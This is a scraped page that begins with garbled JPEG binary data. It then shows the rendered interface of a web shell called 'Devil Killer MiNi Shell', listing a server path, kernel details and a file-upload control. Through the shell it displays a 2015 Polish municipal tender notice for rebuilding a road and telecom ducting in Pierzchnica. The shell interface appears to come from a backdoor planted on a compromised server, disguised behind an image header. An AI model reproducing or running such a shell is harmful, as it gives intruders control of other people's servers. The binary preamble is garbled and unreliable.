JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150421/90270-N-2015.html

<p class="kh_header"><b>Pierzchnica: Przebudowa drogi powiatowej Nr 0353T, odcinek ul. Stawowa w Pierzchnicy</b><br>
<b>Numer ogłoszenia: 90270 - 2015; data zamieszczenia: 21.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pierzchnica , ul. 13 Stycznia 6, 26-015 Pierzchnica, woj. świętokrzyskie, tel. 041 35-38-046, faks 041 35-38-046.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pierzchnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej Nr 0353T, odcinek ul. Stawowa w Pierzchnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest przebudowa drogi powiatowej Nr 0353T, odcinek ul. Stawowa w  Pierzchnicy
1.	Zakres robót:
a) roboty przygotowawcze:
- roboty pomiarowe przy robotach ziemnych dla trasy dróg- ul. Stawowa w Pierzchnicy- 0,926+ 0,015 (0,94100 km),
- rozebranie nawierzchni z mieszanek mineralnobitumicznych, grubość nawierzchni do rozbiórki 11 cm, od ul. Kieleckiej do km 0+ 236 (1266,18 m2),
- rozebranie podbudowy z kruszywa łamanego kamiennego- tłucznia o grubości 20 cm przy przepuście od km 0+156 do km 0+236 (440,00 m2),
- rozebranie istniejącego przepustu o wym. 4,50 m x 1,50 m wylewanego z żelbetu z transportem gruzu z rozbiórki na odległość 5 km (26,40 m3),
- rozebranie ścianek czołowych przepustu żelbetowego z transportem gruzu z rozbiórki na odległość 5 km (7,20 m3),
- rozebranie krawężników betonowych 15cm x 30 cm, ułożonych na podsypce cementowo- piaskowej i ławie betonowej z oporem (271,00 mb),
- rozebranie nawierzchni chodnika z kostki brukowej betonowej o grubości 6 cm na podsypce cementowo- piaskowej o grubości 5 cm (344,40 m2),
- rozebranie obrzeży betonowych o wym. 6 cm x 20 cm (23,50 mb),
- rozebranie fundamentu z betonu pod istniejącym przepustem o grubości 20 cm (36,96 m2),
- usunięcie warstwy ziemi urodzajnej (humusu), grubość warstwy 15 cm ze składowaniem do ponownego zahumusowania skarp i dna rowu (267,30 m3),
- odcięcie nawierzchni bitumicznej piłą do cięcia asfaltu pod budowę poszerzenia- usytuowanie w miejscach usytuowania chodnika przy krawędzi nawierzchni drogi powiatowej (697,00 mb)
b) roboty ziemne:
- wykonanie wykopów mechanicznie w gruncie kat. II- IV z transportem urobku na terenie budowy na odległość do 1 km (z Tabel Robót Ziem.) z uwzględnieniem wykopu pod poszerzenie istniejącej nawierzchni drogi powiatowej (488,77 m3),
- roboty ziemne: wykonanie nasypów z wykopu z dowozem z wykopów na terenie budowy na odległość do 1 km (488,77 m3),
- wykonanie wykopów mechanicznie w gruncie kat. II- IV z odwiezieniem urobku z terenu budowy na odległość do 6 km (547,75 m3),
c) podbudowa pod nawierzchnię drogi:  
- profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni wykonywane mechanicznie (1719,88 m2),
- wykonanie podbudowy pod nawierzchnię drogi ze stabilizacji cementem, stabilizacja o wytrzymałości Rm=1,5-2,5 Mpa o grub. 20 cm wykonana w betoniarniach stacjonarnych (1114,0 m2),
- wykonanie podbudowy nawierzchni drogi z kruszywa kamiennego łamanego stabilizowanego mechanicznie o grubości 22 cm (990,80m2)
d) podbudowa pod nawierzchnię chodników:
- profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni chodników wykonywane mechanicznie (1568,03 m2),
- wykonanie podbudowy nawierzchni chodników z kruszywa kamiennego łamanego stabilizowanego mechanicznie o grubości 10 cm (1414,07 m2),
e) podbudowa pod nawierzchnię zjazdów: 
- profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni i zjazdów wykonywane mechanicznie (438.18 m2),
-wykonywanie podbudowy pod nawierzchnię zjazdów ze stabilizacji cementem, stabilizacja o wytrzymałości Rm=1,5- 2,5 Mpa o grub. 15 cm wykonana w betoniarniach stacjonarnych  (438,18 m2),
- wykonanie podbudowy nawierzchni zjazdów z kruszywa kamiennego łamanego stabilizowanego mechanicznie o grub. 15 cm (418,65 m2),
f) odwodnienie drogi:
- wykonanie kanalizacji deszczowej z rur typu PCV o średnicy 30 cm ułożonych na podłożu z materiałów sypkich, przykanaliki z rur PCV O200 mm, studnie rewizyjne z rur betonowych O1250 (wg KPED karta 02.07 od S1 do S6), studzienki ściekowe wg rys. KPED karta 02.13 (od W1do W11)- 169,00mb
- wykonanie separatora koalescencyjnego zintegrowanego z osadnikiem- wolnostojący (zbiornik PE- HD) o wielkości nominalnej i o wielkości osadnika 150 l (1 szt.),
- wykonanie odwodnienia liniowego 200 mm z wpustem ściekowym systemowym o dł. L=28 mb,
- wykonanie ścieku podchodnikowego (trapezowego0 wg KPED karta 01.30 po 1,5 m każdy (27,00 mb),
- wykonanie ścieku skarpowego na przedłużeniu ścieku podchodnikowego (prefabrykat żelbetowy (trapezowy)- 18,0 mb
- wykonanie przepustów pod zjazdami z prefabrykatów skrzynkowych o wym. 48 cm x 56 cm ułożonych na ławie fundamentowej betonowej (Rm=5,0 Mpa)wg KSD karta 16, 16a i 16 b ( 122,00 mb)
	g) przepust skrzynkowy 400x 200 cm:
- ława fundamentowa pod przepust skrzynkowy z betonu C 8)12 (B-10) o grub. 40 cm w km 0+188,35 (45,76 m2),
- wykonanie części przelotowej przepustu żelbetowego skrzynkowego o przekroju dwudzielnym o wym. 400x 200 cm (10 mb),
- obudowy wlotów i wylotów przepustu skrzynkowego o wym. wg rys. z Projektu Budowlanego (beton C35/40 ze zbrojeniem)- 31,40 m3, 2 szt.,
- wykonanie i zagęszczenie mech. warstwy zapkowej przepustu warstwami o grubości warstwy po zagęszczeniu 30 cm- grub. zasypki 300 cm (180,00 m3)
-ustawienie poręczy ochronnych sztywnych z pochytami i poręczami z rur stalowych o rozstawie słupków z rur co 1,50 m, grub. 8 cm na podsypce cem.- piaskowej o grub. 5 cm (kostka szara)- 11,00 mb
h) nawierzchnia drogi powiatowej:
-wykonanie podbudowy zasadniczej z betonu asfaltowego (mieszanki mineralno- asfaltowej grysowej), grubość warstwy po zagęszczeniu 7 cm (przy poszerzeniu przy ul. Kieleckiej, na odtworzeniu przy przepuście skrzynkowym oraz na poszerzeniach drogi powiatowej po lewej stronie przy chodniku- AC 22P- (990,78 m2),
- ułożenie geosiatki o wytrzymałości 50x50 kN/m na styku poszerzenia nawierzchni z istniejącą nawierzchnią od km 0+000 do km 0+045 (45,00 m2),
- ułożenie warstwy pośredniej z geosiatki o wytrzymałości powyżej 20 kN)m na całej powierzchni poszerzenia przy chodniku (348,90 m2),
- wykonanie nawierzchni z betonu asfaltowego dla ruchu KR3- warstwa wiążąca z betonu asfaltowego o grubości 6 cm- AC 16W- (1815,20 m2),
- wykonanie nawierzchni z betonu asfaltowego dla ruchu KR3- warstwa ścieralna z betonu asfaltowego o grubości 5 m- AC8S- (1815,20 m2)
	i) elementy ulic:
- ustawienie krawężnika betonowego o wym. 20 cm x 30 cm na ławie betonowej z oporem (beton C 8/10) krawężnik wystający 12 cm- (1084,50 mb),
- wykonanie nawierzchni chodnika z kostki brukowej betonowej o grub. 8 cm na podsypce cementowo- piaskowej o grub. 5 cm- kolor- (1414,07 m2),
- ustawienie obrzeży betonowych o wym. 20 cm x 6 cm na podsypce cementowo- piaskowej- 1: 4- (887,00 mb)
	j) nawierzchnia zjazdów do posesji:
    - wykonanie nawierzchni zjazdów z kostki brukowej betonowej szarej o grub. 8 cm na podsypce cementowo- piaskowej o grub. 5 cm- (418,65 m2),
   -  ustawienie opornika betonowego o wym. 12x 25 bez ławy betonowej na podsypce cementowo- piaskowej- wtopionych z wypełnieniem spoin zaprawą cementową (na zjazdach)- 202,00 mb 
	k) przepust pod zjazdem publicznym:
	- wykonanie przepustu pod zjazdem publicznym z rur żelbetowych O40 cm- (7,00 mb),
	- wykonanie ścianek czołowych prefabrykowanych dla przepustu O 40 cm pod zjazdem publicznym- tzw. doków wg KPED karta 01.20 i karta 01.21- 2 szt.
	l) urządzenia bezpieczeństwa ruchu:
	- ustawienie barier ochronnych stalowych jednostronnych typu SP- 04)1- (72,00 mb),
	- oznakowanie poziome jezdni farbą akrylową białą- linie P-10 (przejście dla pieszych) i linia P-14 (warunkowego zatrzymania)- 17,81 m2,
	- ustawienie słupków stalowych do znaków z rur O70 mm wraz z przymocowaniem znaku A-7 i D-6- folia odblaskowa II generacji- 3 szt.
	m) roboty wykończeniowe:
	- umocnienie skarp i dna rowu płytami ażurowymi 60x 40x 10 cm w miejscach o pochyleniu skarp większym niż 1:1,5 oraz przepustem po obu stronach, wypełnienie wolnych przestrzeni humusem i obsianie trawą, podsypka piaskowa 5 cm- (856,00 m2),
	- umocnienie poboczy kruszywem łamanym stabilizowanym mechanicznie 0/31,5 mm o grubości warstwy po zagęszczeniu 10 cm- (94,00 m2),
	n) inne roboty:
	- ustawienie oświetlenia ulicznego- lampa z zasilaniem solarnym automatyczna o wys. całk. 6,70 m- 1 szt.
2.	Zakres robót- część telekomunikacyjna:
a)	Roboty budowlane w zakresie telekomunikacji:
- budowa studni kablowych prefabrykowanych rozdzielczych SKR, typ SKR-2 w gruncie kat. III- 1 szt.
- wykonywanie przepustów pod drogami prostoliniowo przeciskiem hydraulicznym, z powrotnym wciąganiem rur (kat. gruntu III- IV, dł. do 10 m, rura HDPE 110 mm- 10 mb,
- budowa kanalizacji kablowej pierwotnej z rur z tworzyw sztucznych w wykopie wykonanym mechanicznie w gruncie kat. III, jedna warstwa i dwa otwory w ciągu kanalizacji, dwie rury w warstwie- 54,00 m,
- wywóz ziemi i gruzu na wyznaczone wysypisko z załadowaniem i wyładowaniem samochodami na odległość do 1 km (grunt kat. I- III)- 20,00 m3,
- remont cząstkowy nawierzchni z kostki brukowej na podsypce piaskowej, spoiny wypełnione piaskiem, grub. kostki 6 cm- 15 m2,
- montaż elementów mechanicznej ochrony przed ingerencją osób nieuprawnionych w istniejących studniach kablowych, pokrywa dodatkowa z listwami, rama ciężka lub podwójna lekka- 1 szt.,
- demontaż kanalizacji telefonicznej- analogia KNR 501)115)11- 56,50 mb
- mechaniczna rozbiórka studni kablowych SK- 2- 1 szt.
b) sprzęt i kable telekomunikacyjne:
- wciąganie kabla wypełnionego w powłoce termoplastycznej do kanalizacji kablowej, mechanicznie, średnica kabla 30- 50 mm, otwór kanalizacji wolny, kabel 35x 4- 69,00m,
- wciąganie kabla wypełnionego w powłoce termoplastycznej do kanalizacji kablowej, mechanicznie, średnica kabla 30- 50 mm, otwór kanalizacji wolny, kabel 15x 4- 69,00m,
- ręczne wciąganie rur kanalizacji wtórnej, otwór wolny, rury w zwojach, 1x Fi 32 mm- 69,00 m,
- montaż złączy równoległych kabli wypełnionych ułożonych w kanalizacji kablowej z zastosowaniem modułowych łączników żył i termokurczliwych osłon wzmocnionych, kabel o 70 parach- złącze 2,
- montaż złączy równoległych kabli wypełnionych ułożonych w kanalizacji kablowej z zastosowaniem modułowych łączników żył i termokurczliwych osłon wzmocnionych, kabel o 30 parach- złącze 2,
- wyłączanie kabla równoległego ze złącza kabla wypełnionego ułożonego w kanalizacji kablowej z zastosowaniem termokurczliwych osłon wzmocnionych, kabel o 70 parach- złącze 2,
- wyłączanie kabla równoległego ze złącza kabla wypełnionego ułożonego w kanalizacji kablowej z zastosowaniem termokurczliwych osłon wzmocnionych, kabel o 30 parach- złącze 2,
- pomiary końcowe prądem stałym, kabel o liczbie par 70- odcinek 7,
- pomiary końcowe prądem stałym, kabel o liczbie par 30- odcinek 1,
- pomiar tłumienności zbliżno- i zdalnoprzenikowej przy jednej częstotliwości, kabel o liczbie par 70- odcinek 7,
- pomiar tłumienności zbliżno- i zdalnoprzenikowej przy jednej częstotliwości, kabel o liczbie par 30- odcinek 1,
- wyciąganie kabla w powłoce termoplastycznej z kanalizacji kablowej, otwór z więcej niż 1 kablem, kabel fi 30 mm- 170,00m,
- wyciąganie kabli światłowodowych- wyciąganie kabla światłodowego z kanalizacji wtórnej wciągarką mechaniczną z rejestratorem siły, kabel do przyłożenia- 0,104 km,
- montaż stelaży zapasów kabli światłowodowych, montaż w budynku- 2 szt.,
- montaż złączy przelotowych na kablach światłowodowych ułożonych w kanalizacji kablowej, kabel tubowy, mufa zapinana, jeden spajany światłowód- złącze 2,
- montaż złączy przelotowych na kablach światłowodowych ułożonych w kanalizacji kablowej, kabel tubowy, mufa zapinana,  dodatek za każdy następny spajany światłowód- złącze 14,
- pomiary reflektometryczne linii światłowodowych, pomiary końcowe odcinka regeneratorowego  z przełącznicy, mierzony 1 światłowód- odcinek 7,
- pomiary reflektometryczne linii światłowodowych, pomiary końcowe odcinka regeneratorowego z przełącznicy, dodatek za każdy zmierzony  światłowód-  odcinek 7,
- pomiary tłumienności optycznej linii światłowodowych metodą transmisyjną, pomiar przeprowadzony razem z innymi pomiarami, mierzony 1 światłowód- odcinek 1,
- pomiary tłumienności optycznej linii światłowodowych metodą transmisyjną, pomiar przeprowadzony razem z innymi pomiarami,  dodatek za każdy zmierzony światłowód- odcinek 7,
- wykonanie dołów o powierzchni dna do 0,2 m2 i głębokości do 1,0 m, doły o głębokości do 0,4 m, grunt kat. III- 1 szt.

Szczegółowy zakres robót zawarty jest w załącznikach do niniejszej specyfikacji:
a)	Dokumentacji projektowej
b)	Przedmiarach robót
c)	Specyfikacji technicznej wykonania i odbioru robót budowlanych.

Na Wykonawcy ciąży obowiązek:
- zapewnienia organizacji ruchu na czas budowy przepustu skrzynkowego,
- zapewnienia przejścia dla pieszych przez ciek wodny do centrum Pierzchnicy na czas budowy przepustu skrzynkowego,
- wykonania inwentaryzacji geodezyjno-powykonawczej i innych dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie oraz uzyskanie pozwolenia na użytkowanie obiektu.

Zaleca się przeprowadzenie wizji lokalnej terenu objętego niniejszym zamówieniem, celem sprawdzenia miejsca robót oraz warunków związanych z wykonaniem prac będących przedmiotem zamówienia. W związku z powyższym wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny i pominięcia elementów niezbędnych do wykonania umowy. Koszt wizji lokalnej ponosi Wykonawca..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających do  50 % zakresu usługi wymienionej   w umowie  podstawowej</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.00.00.00-7, 45.23.23.10-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości  30 000,00  PLN (trzydzieści tysięcy zł ) należy wnieść przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku należy złożyć oświadczenie zgodnie z załącznikiem nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niniejszego warunku należy złożyć:
- wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy  i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał należycie:
co najmniej dwie roboty budowlane, polegające na  budowie, rozbudowie, przebudowie lub remoncie dróg o wartości minimum 1 000 000,00 złotych (jeden milion złotych) brutto każda.
Do wykazu, należy załączyć dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niniejszego warunku należy złożyć:
	- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami. 
	Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli wykaże, że dysponuje osobą:
	  - Jednego Kierownika budowy - min. 3 lata doświadczenia zawodowego liczonego od uzyskania uprawnień, posiadający uprawnienia do kierowania robotami drogowymi
	- Jednego Kierownika budowy - min. 3 lata doświadczenia zawodowego liczonego od uzyskania uprawnień, posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji  i urządzeń telekomunikacyjnych.
	
Do oferty należy dołączyć oświadczenie Wykonawcy, że zaproponowane osoby posiadają wymagane uprawnienia i przynależą do właściwej izby samorządu zawodowego, jeżeli taki wymóg na te osoby nakłada Prawo budowlane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niniejszego warunku należy złożyć:
- opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności tj. wykonywaniem robót budowlanych na kwotę nie mniejszą niż 1 000 000,00 zł (jeden milion złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

